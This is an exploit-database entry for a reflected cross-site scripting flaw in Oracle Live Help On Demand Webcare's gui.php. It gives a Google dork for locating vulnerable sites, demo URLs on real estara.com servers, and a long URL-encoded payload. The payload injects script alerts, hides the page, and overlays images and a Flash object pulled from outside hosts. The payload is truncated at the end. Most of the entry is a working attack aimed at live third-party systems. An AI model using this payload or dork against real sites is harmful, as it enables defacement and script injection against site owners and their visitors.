Oracle Live Help On Demand Webcare Cross Site Scripting



EKU-ID: 1567 CVE: OSVDB-ID:
Author: Sony Published: 2012-03-01 Verified: Verified
Download:

Rating

☆☆☆☆☆
Home


# Exploit Title: Oracle Live Help On Demand Webcare Cross Site Scripting
# Date: 29.02.2012
# Author: Sony
# Software Link: http://www.oracle.com/index.html
# Google Dorks:inurl:UI/gui.php
# Web Browser : Mozilla Firefox
# Blog : http://st2tea.blogspot.com
# PoC:
http://st2tea.blogspot.com/2012/02/oracle-live-help-on-demand-webcare.html
..................................................................

Demo:

http://as00.estara.com/UI/gui.php?accountid=200106284055 [our xss is here]

http://as00.estara.com/UI/gui.php?accountid=200106284055&template=314323&calltype=webvoicepop&linkfile=%2FOneCC%2F200106284055%2F314323.js&referrer=Email&donotcache=1101055368&emaillink=1&guiid=440d09ef58217&timestamp=1234150034

or

https://t-603.estara.com/UI/gui.php?accountid=200106300249&template=823514&calltype=webvoicepop&linkfile=%2FOneCC%2F200106300249%2F823514.js&referrer=Email&donotcache=1444509745&emaillink=1&guiid=43834a54eac25&timestamp=1321973587



http://as00.estara.com/UI/gui.php?accountid=200106284055%22%22%3E%3Cscript%3Ealert%28%22..%22%29%3C/script%3E%3Cscript%3Ealert%28%22Sony:Salut!%22%29%3C/script%3E%3Cscript%3Ealert%28%22Admin:Hi%22%29%3C/script%3E%3Cscript%3Ealert%28%22Sony:Uhh%20Ahh%20Yeah%22%29%3C/script%3E%3Cscript%3Ealert%28%22Admin:?%22%29%3C/script%3E%3Cscript%3Ealert%28%22Sony:it%27s%20Song..%22%29%3C/script%3E%3Cscript%3Ealert%28%22Admin:What%20Song?%22%29%3C/script%3E%3Cscript%3Ealert%28%22Sony:Uhh%20Ahh%20Yeah%20by%20Dan%20Balan%22%29%3C/script%3E%3Cscript%3Ealert%28%22Admin:Oh,cool..%22%29%3C/script%3E%3Cscript%3Ealert%28%22Sony:p.s.%20I%20found%20xss%20on%20the%20oracle..%22%29%3C/script%3E%3Cscript%3Ealert%28%22Admin:Don%27t%20care,%20i%20like%20this%20song..Uhh%20Ahh%20Yeah!%22%29%3C/script%3E%3Cscript%3Ealert%28%22Sony:Yeah..%22%29%3C/script%3E%3Cstyle%3Ebody{visibility:hidden;}%20html{background-image:url%28%27http://www.hampton.gov/youth/images/white_background.png%27%29;}%3C/style%3E%3Cdiv%20style=%22position:%20absolute;center:%20420px;top:%2040px;%E2%80%8B%E2%80%8Bz-index:%2010;visibility:%20visible;%20color:%20black;%20font-size:%2040px;%22%3E%3Cimg%20src=%22http://4.bp.blogspot.com/_iHaUzis1v4c/TK_GUArAtqI/AAAAAAAANeU/6vCNrSFQu2E/s640/Ascii_Dance.gif%22%20style=%22height:%20350px;%20width:%20576px;%22%3E%20%3Cobject%20data=http://htmlka.com/wp-content/uploads/2009/06/webplayer.swf%20type=%22application/x-shockwave-flash%22%20width=%22240%22%20height=%2264%22%3E%3Cparam%20name=%22movie%22%20value=http://htmlka.com/wp-content/uploads/2009/06/webplayer.swf%3E%3Cparam%20name=%22menu%22%20value=%22false%22%3E%20%3Cparam%20name=%22scale%22%20value=%22noscale%22%3E%3Cparam%20name=%22flashvars%22%20value=%22src=/img/uploadimg/20120301/1708350.JPG

Video:

http://www.youtube.com/watch?v=og_Ev7glz_g